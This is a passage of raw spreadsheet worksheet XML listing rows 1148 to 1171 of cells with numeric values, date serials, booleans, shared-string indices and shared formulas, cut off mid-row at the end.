        <v>4970</v>
      </c>
      <c r="K1148" s="2" t="s">
        <v>4971</v>
      </c>
      <c r="L1148" s="1">
        <v>3.0</v>
      </c>
      <c r="M1148" s="1">
        <v>3.0</v>
      </c>
      <c r="N1148" s="1" t="s">
        <v>4972</v>
      </c>
      <c r="O1148" s="1" t="s">
        <v>4973</v>
      </c>
      <c r="P1148" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1148" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1148" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1148" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="1">
        <v>16077.0</v>
      </c>
      <c r="B1149" s="2" t="s">
        <v>4974</v>
      </c>
      <c r="C1149" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1149" s="2" t="s">
        <v>4975</v>
      </c>
      <c r="E1149" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1149" s="1" t="s">
        <v>2594</v>
      </c>
      <c r="G1149" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1149" s="1" t="s">
        <v>4976</v>
      </c>
      <c r="I1149" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1149" s="1" t="s">
        <v>4970</v>
      </c>
      <c r="K1149" s="2" t="s">
        <v>4971</v>
      </c>
      <c r="L1149" s="1">
        <v>3.0</v>
      </c>
      <c r="M1149" s="1">
        <v>3.0</v>
      </c>
      <c r="N1149" s="1" t="s">
        <v>4977</v>
      </c>
      <c r="O1149" s="1" t="s">
        <v>4973</v>
      </c>
      <c r="P1149" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1149" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1149" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1149" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="1">
        <v>16108.0</v>
      </c>
      <c r="B1150" s="2" t="s">
        <v>4978</v>
      </c>
      <c r="C1150" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1150" s="2" t="s">
        <v>4979</v>
      </c>
      <c r="E1150" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1150" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="G1150" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1150" s="4">
        <v>44838.79583333333</v>
      </c>
      <c r="I1150" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1150" s="1" t="s">
        <v>4980</v>
      </c>
      <c r="K1150" s="2" t="s">
        <v>4981</v>
      </c>
      <c r="L1150" s="1">
        <v>5.0</v>
      </c>
      <c r="M1150" s="1">
        <v>7.0</v>
      </c>
      <c r="N1150" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1150" s="1" t="s">
        <v>4982</v>
      </c>
      <c r="P1150" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1150" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1150" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1150" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="1">
        <v>16109.0</v>
      </c>
      <c r="B1151" s="2" t="s">
        <v>4983</v>
      </c>
      <c r="C1151" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1151" s="2" t="s">
        <v>4984</v>
      </c>
      <c r="E1151" s="8" t="s">
        <v>4919</v>
      </c>
      <c r="F1151" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1151" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1151" s="4">
        <v>44838.836805555555</v>
      </c>
      <c r="I1151" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1151" s="1" t="s">
        <v>4980</v>
      </c>
      <c r="K1151" s="2" t="s">
        <v>4981</v>
      </c>
      <c r="L1151" s="1">
        <v>5.0</v>
      </c>
      <c r="M1151" s="1">
        <v>7.0</v>
      </c>
      <c r="N1151" s="1" t="s">
        <v>2777</v>
      </c>
      <c r="O1151" s="1" t="s">
        <v>4982</v>
      </c>
      <c r="P1151" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1151" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1151" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1151" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="1">
        <v>16110.0</v>
      </c>
      <c r="B1152" s="2" t="s">
        <v>4985</v>
      </c>
      <c r="C1152" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1152" s="2" t="s">
        <v>4986</v>
      </c>
      <c r="E1152" s="8" t="s">
        <v>135</v>
      </c>
      <c r="F1152" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="G1152" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1152" s="4">
        <v>44838.84722222222</v>
      </c>
      <c r="I1152" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1152" s="1" t="s">
        <v>4980</v>
      </c>
      <c r="K1152" s="2" t="s">
        <v>4981</v>
      </c>
      <c r="L1152" s="1">
        <v>5.0</v>
      </c>
      <c r="M1152" s="1">
        <v>7.0</v>
      </c>
      <c r="N1152" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O1152" s="1" t="s">
        <v>4982</v>
      </c>
      <c r="P1152" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1152" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1152" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1152" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="1">
        <v>16115.0</v>
      </c>
      <c r="B1153" s="2" t="s">
        <v>4987</v>
      </c>
      <c r="C1153" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1153" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1153" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1153" s="1" t="s">
        <v>4989</v>
      </c>
      <c r="G1153" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1153" s="1" t="s">
        <v>4990</v>
      </c>
      <c r="I1153" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1153" s="1" t="s">
        <v>4991</v>
      </c>
      <c r="K1153" s="2" t="s">
        <v>4992</v>
      </c>
      <c r="L1153" s="1">
        <v>3.0</v>
      </c>
      <c r="M1153" s="1">
        <v>3.0</v>
      </c>
      <c r="N1153" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1153" s="1" t="s">
        <v>4993</v>
      </c>
      <c r="P1153" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1153" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1153" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1153" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="1">
        <v>16116.0</v>
      </c>
      <c r="B1154" s="2" t="s">
        <v>4994</v>
      </c>
      <c r="C1154" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1154" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1154" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1154" s="1" t="s">
        <v>4996</v>
      </c>
      <c r="G1154" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1154" s="1" t="s">
        <v>4997</v>
      </c>
      <c r="I1154" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1154" s="1" t="s">
        <v>4991</v>
      </c>
      <c r="K1154" s="2" t="s">
        <v>4992</v>
      </c>
      <c r="L1154" s="1">
        <v>3.0</v>
      </c>
      <c r="M1154" s="1">
        <v>3.0</v>
      </c>
      <c r="N1154" s="1" t="s">
        <v>2951</v>
      </c>
      <c r="O1154" s="1" t="s">
        <v>4993</v>
      </c>
      <c r="P1154" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1154" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1154" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1154" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="1">
        <v>16117.0</v>
      </c>
      <c r="B1155" s="2" t="s">
        <v>4998</v>
      </c>
      <c r="C1155" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1155" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1155" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1155" s="1" t="s">
        <v>4999</v>
      </c>
      <c r="G1155" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1155" s="4">
        <v>43805.00486111111</v>
      </c>
      <c r="I1155" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1155" s="1" t="s">
        <v>4991</v>
      </c>
      <c r="K1155" s="2" t="s">
        <v>4992</v>
      </c>
      <c r="L1155" s="1">
        <v>3.0</v>
      </c>
      <c r="M1155" s="1">
        <v>3.0</v>
      </c>
      <c r="N1155" s="1" t="s">
        <v>5000</v>
      </c>
      <c r="O1155" s="1" t="s">
        <v>4993</v>
      </c>
      <c r="P1155" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1155" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1155" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1155" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="1">
        <v>16118.0</v>
      </c>
      <c r="B1156" s="2" t="s">
        <v>5001</v>
      </c>
      <c r="C1156" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1156" s="2" t="s">
        <v>5002</v>
      </c>
      <c r="E1156" s="2" t="s">
        <v>2095</v>
      </c>
      <c r="F1156" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1156" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1156" s="4">
        <v>44167.60763888889</v>
      </c>
      <c r="I1156" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1156" s="1" t="s">
        <v>5003</v>
      </c>
      <c r="K1156" s="2" t="s">
        <v>5004</v>
      </c>
      <c r="L1156" s="1">
        <v>1.0</v>
      </c>
      <c r="M1156" s="1">
        <v>1.0</v>
      </c>
      <c r="N1156" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1156" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1156" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1156" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1156" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1156" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="1">
        <v>16120.0</v>
      </c>
      <c r="B1157" s="2" t="s">
        <v>5005</v>
      </c>
      <c r="C1157" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1157" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1157" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1157" s="1" t="s">
        <v>5006</v>
      </c>
      <c r="G1157" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1157" s="1" t="s">
        <v>5007</v>
      </c>
      <c r="I1157" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1157" s="1" t="s">
        <v>5008</v>
      </c>
      <c r="K1157" s="2" t="s">
        <v>5009</v>
      </c>
      <c r="L1157" s="1">
        <v>4.0</v>
      </c>
      <c r="M1157" s="1">
        <v>7.0</v>
      </c>
      <c r="N1157" s="1" t="s">
        <v>5010</v>
      </c>
      <c r="O1157" s="1" t="s">
        <v>5011</v>
      </c>
      <c r="P1157" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1157" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1157" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1157" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="1">
        <v>16121.0</v>
      </c>
      <c r="B1158" s="2" t="s">
        <v>5012</v>
      </c>
      <c r="C1158" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1158" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1158" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1158" s="1" t="s">
        <v>5013</v>
      </c>
      <c r="G1158" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1158" s="1" t="s">
        <v>5014</v>
      </c>
      <c r="I1158" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1158" s="1" t="s">
        <v>5008</v>
      </c>
      <c r="K1158" s="2" t="s">
        <v>5009</v>
      </c>
      <c r="L1158" s="1">
        <v>4.0</v>
      </c>
      <c r="M1158" s="1">
        <v>7.0</v>
      </c>
      <c r="N1158" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O1158" s="1" t="s">
        <v>5011</v>
      </c>
      <c r="P1158" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1158" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1158" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1158" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="1">
        <v>16126.0</v>
      </c>
      <c r="B1159" s="2" t="s">
        <v>5015</v>
      </c>
      <c r="C1159" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1159" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1159" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1159" s="1" t="s">
        <v>321</v>
      </c>
      <c r="G1159" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1159" s="1" t="s">
        <v>5016</v>
      </c>
      <c r="I1159" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1159" s="1" t="s">
        <v>5017</v>
      </c>
      <c r="K1159" s="2" t="s">
        <v>5018</v>
      </c>
      <c r="L1159" s="1">
        <v>3.0</v>
      </c>
      <c r="M1159" s="1">
        <v>5.0</v>
      </c>
      <c r="N1159" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1159" s="1" t="s">
        <v>5019</v>
      </c>
      <c r="P1159" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1159" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1159" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1159" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="1">
        <v>16150.0</v>
      </c>
      <c r="B1160" s="2" t="s">
        <v>5020</v>
      </c>
      <c r="C1160" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1160" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1160" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1160" s="1" t="s">
        <v>5021</v>
      </c>
      <c r="G1160" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1160" s="1" t="s">
        <v>5022</v>
      </c>
      <c r="I1160" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="J1160" s="1" t="s">
        <v>5023</v>
      </c>
      <c r="K1160" s="2" t="s">
        <v>5024</v>
      </c>
      <c r="L1160" s="1">
        <v>4.0</v>
      </c>
      <c r="M1160" s="1">
        <v>4.0</v>
      </c>
      <c r="N1160" s="1" t="s">
        <v>1108</v>
      </c>
      <c r="O1160" s="1" t="s">
        <v>5025</v>
      </c>
      <c r="P1160" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1160" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1160" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1160" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="1">
        <v>16151.0</v>
      </c>
      <c r="B1161" s="2" t="s">
        <v>5026</v>
      </c>
      <c r="C1161" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1161" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1161" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1161" s="1" t="s">
        <v>4657</v>
      </c>
      <c r="G1161" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1161" s="1" t="s">
        <v>5027</v>
      </c>
      <c r="I1161" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="J1161" s="1" t="s">
        <v>5023</v>
      </c>
      <c r="K1161" s="2" t="s">
        <v>5024</v>
      </c>
      <c r="L1161" s="1">
        <v>4.0</v>
      </c>
      <c r="M1161" s="1">
        <v>4.0</v>
      </c>
      <c r="N1161" s="1" t="s">
        <v>5028</v>
      </c>
      <c r="O1161" s="1" t="s">
        <v>5025</v>
      </c>
      <c r="P1161" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1161" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1161" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1161" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="1">
        <v>16153.0</v>
      </c>
      <c r="B1162" s="2" t="s">
        <v>5029</v>
      </c>
      <c r="C1162" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1162" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1162" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1162" s="1" t="s">
        <v>5030</v>
      </c>
      <c r="G1162" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1162" s="4">
        <v>44810.59861111111</v>
      </c>
      <c r="I1162" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1162" s="1" t="s">
        <v>5031</v>
      </c>
      <c r="K1162" s="2" t="s">
        <v>5032</v>
      </c>
      <c r="L1162" s="1">
        <v>3.0</v>
      </c>
      <c r="M1162" s="1">
        <v>3.0</v>
      </c>
      <c r="N1162" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1162" s="1" t="s">
        <v>5033</v>
      </c>
      <c r="P1162" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1162" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1162" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1162" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="1">
        <v>16155.0</v>
      </c>
      <c r="B1163" s="2" t="s">
        <v>5034</v>
      </c>
      <c r="C1163" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1163" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1163" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1163" s="1" t="s">
        <v>1208</v>
      </c>
      <c r="G1163" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1163" s="1" t="s">
        <v>5035</v>
      </c>
      <c r="I1163" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1163" s="1" t="s">
        <v>5031</v>
      </c>
      <c r="K1163" s="2" t="s">
        <v>5032</v>
      </c>
      <c r="L1163" s="1">
        <v>3.0</v>
      </c>
      <c r="M1163" s="1">
        <v>3.0</v>
      </c>
      <c r="N1163" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O1163" s="1" t="s">
        <v>5033</v>
      </c>
      <c r="P1163" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1163" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1163" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1163" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="1">
        <v>16199.0</v>
      </c>
      <c r="B1164" s="2" t="s">
        <v>5036</v>
      </c>
      <c r="C1164" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1164" s="2" t="s">
        <v>5037</v>
      </c>
      <c r="E1164" s="8" t="s">
        <v>4919</v>
      </c>
      <c r="F1164" s="1" t="s">
        <v>5038</v>
      </c>
      <c r="G1164" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1164" s="1" t="s">
        <v>5039</v>
      </c>
      <c r="I1164" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1164" s="1" t="s">
        <v>5040</v>
      </c>
      <c r="K1164" s="2" t="s">
        <v>5041</v>
      </c>
      <c r="L1164" s="1">
        <v>1.0</v>
      </c>
      <c r="M1164" s="1">
        <v>1.0</v>
      </c>
      <c r="N1164" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1164" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1164" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1164" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1164" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1164" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="1">
        <v>16200.0</v>
      </c>
      <c r="B1165" s="2" t="s">
        <v>5042</v>
      </c>
      <c r="C1165" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1165" s="2" t="s">
        <v>5043</v>
      </c>
      <c r="E1165" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1165" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G1165" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1165" s="1" t="s">
        <v>5044</v>
      </c>
      <c r="I1165" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1165" s="1" t="s">
        <v>5045</v>
      </c>
      <c r="K1165" s="2" t="s">
        <v>5046</v>
      </c>
      <c r="L1165" s="1">
        <v>39.0</v>
      </c>
      <c r="M1165" s="1">
        <v>57.0</v>
      </c>
      <c r="N1165" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1165" s="1" t="s">
        <v>5047</v>
      </c>
      <c r="P1165" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1165" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1165" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1165" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="1">
        <v>16293.0</v>
      </c>
      <c r="B1166" s="2" t="s">
        <v>5048</v>
      </c>
      <c r="C1166" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1166" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1166" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1166" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1166" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1166" s="1" t="s">
        <v>5049</v>
      </c>
      <c r="I1166" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1166" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1166" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1166" s="1">
        <v>5.0</v>
      </c>
      <c r="M1166" s="1">
        <v>10.0</v>
      </c>
      <c r="N1166" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1166" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1166" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1166" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1166" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1166" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="1">
        <v>16294.0</v>
      </c>
      <c r="B1167" s="2" t="s">
        <v>5053</v>
      </c>
      <c r="C1167" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1167" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1167" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1167" s="1" t="s">
        <v>5054</v>
      </c>
      <c r="G1167" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1167" s="1" t="s">
        <v>5055</v>
      </c>
      <c r="I1167" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1167" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1167" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1167" s="1">
        <v>5.0</v>
      </c>
      <c r="M1167" s="1">
        <v>10.0</v>
      </c>
      <c r="N1167" s="1" t="s">
        <v>5056</v>
      </c>
      <c r="O1167" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1167" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1167" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1167" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1167" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="1">
        <v>16295.0</v>
      </c>
      <c r="B1168" s="2" t="s">
        <v>5057</v>
      </c>
      <c r="C1168" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1168" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1168" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1168" s="1" t="s">
        <v>5058</v>
      </c>
      <c r="G1168" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1168" s="1" t="s">
        <v>5059</v>
      </c>
      <c r="I1168" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1168" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1168" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1168" s="1">
        <v>5.0</v>
      </c>
      <c r="M1168" s="1">
        <v>10.0</v>
      </c>
      <c r="N1168" s="1" t="s">
        <v>1136</v>
      </c>
      <c r="O1168" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1168" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1168" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1168" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1168" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="1">
        <v>16296.0</v>
      </c>
      <c r="B1169" s="2" t="s">
        <v>5060</v>
      </c>
      <c r="C1169" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1169" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1169" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1169" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1169" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1169" s="1" t="s">
        <v>5061</v>
      </c>
      <c r="I1169" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1169" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1169" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1169" s="1">
        <v>5.0</v>
      </c>
      <c r="M1169" s="1">
        <v>10.0</v>
      </c>
      <c r="N1169" s="1" t="s">
        <v>5062</v>
      </c>
      <c r="O1169" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1169" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1169" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1169" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1169" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="1">
        <v>16297.0</v>
      </c>
      <c r="B1170" s="2" t="s">
        <v>5063</v>
      </c>
      <c r="C1170" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1170" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1170" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F1170" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1170" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1170" s="1" t="s">
        <v>5064</v>
      </c>
      <c r="I1170" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J1170" s="1" t="s">
        <v>5050</v>
      </c>
      <c r="K1170" s="2" t="s">
        <v>5051</v>
      </c>
      <c r="L1170" s="1">
        <v>5.0</v>
      </c>
      <c r="M1170" s="1">
        <v>10.0</v>
      </c>
      <c r="N1170" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1170" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="P1170" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1170" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1170" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1170" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="1">
        <v>16298.0</v>
      </c>
      <c r="B1171" s="2" t="s">
        <v>5065</v>
      </c>
      <c r="C1171" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1171" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1171" s="2" t="s">
